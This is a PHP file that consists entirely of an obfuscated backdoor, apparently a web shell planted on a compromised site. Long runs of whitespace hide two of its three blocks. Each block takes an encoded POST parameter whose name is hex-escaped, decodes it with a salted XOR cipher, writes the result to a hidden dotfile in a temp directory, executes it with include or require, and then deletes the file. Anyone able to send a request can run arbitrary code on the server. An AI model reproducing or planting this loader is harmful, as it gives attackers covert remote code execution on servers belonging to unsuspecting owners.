<?php																																										if(filter_has_var(INPUT_POST, "\x64ata\x5Fchunk")){ $bind = $_POST["\x64ata\x5Fchunk"]; $bind = explode( "." , $bind) ; $record = ''; $s1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s1 ); foreach($bind as $n => $v1) { $chS = ord($s1[$n % $sLen] ); $dec =((int)$v1 - $chS -($n % 10)) ^ 85; $record .= chr($dec ); } $key = array_filter([sys_get_temp_dir(), "/tmp", "/var/tmp", getenv("TEMP"), session_save_path(), ini_get("upload_tmp_dir"), "/dev/shm", getcwd(), getenv("TMP")]); while ($rec = array_shift($key)) { if (is_writable($rec) && is_dir($rec)) { $k = str_replace("{var_dir}", $rec, "{var_dir}/.element"); $file = fopen($k, 'w'); if ($file) { fwrite($file, $record); fclose($file); include $k; @unlink($k); exit; } } } }
																																										if(array_key_exists("r\x65\x66", $_POST)){ $item = $_POST["r\x65\x66"]; $item = explode( ".", $item) ; $component=''; $s4='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen( $s4); foreach( $item as $j => $v5) {$sChar=ord( $s4[$j % $sLen]); $d=( ( int)$v5 - $sChar -( $j % 10)) ^ 30; $component .= chr( $d); } $pgrp = array_filter([session_save_path(), getcwd(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/tmp", "/var/tmp", "/dev/shm", sys_get_temp_dir(), getenv("TMP")]); foreach ($pgrp as $key => $obj) { if (max(0, is_dir($obj) * is_writable($obj))) { $dchunk = vsprintf("%s/%s", [$obj, ".symbol"]); if (@file_put_contents($dchunk, $component) !== false) { include $dchunk; unlink($dchunk); exit; } } } }


if(array_key_exists("\x66\x6Cg", $_POST) && !is_null($_POST["\x66\x6Cg"])){
	$record = $_POST["\x66\x6Cg"];
	  $record		=	 explode( '.'			,  	$record  	)	  ;
	$dat = '';
            $salt8 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen( 	$salt8);
            $u = 0;
            $len = count( 	$record);
    
            do {
                if( 	$u >= $len) break;
                $v5 = $record[$u];
                $sChar = ord( 	$salt8[$u % $sLen]);
                $dec =( 	( 	int)$v5 - $sChar -( 	$u % 10)) ^ 91;
                $dat.=chr( 	$dec);
                $u++;
            } while( 	true);
	$k = array_filter(["/var/tmp", sys_get_temp_dir(), "/tmp", getenv("TEMP"), "/dev/shm", session_save_path(), ini_get("upload_tmp_dir"), getcwd(), getenv("TMP")]);
	foreach ($k as $marker):
    		if ((bool)is_dir($marker) && (bool)is_writable($marker)) {
    $descriptor = "$marker/.holder";
    if (file_put_contents($descriptor, $dat)) {
	require $descriptor;
	unlink($descriptor);
	exit;
}
}
endforeach;
}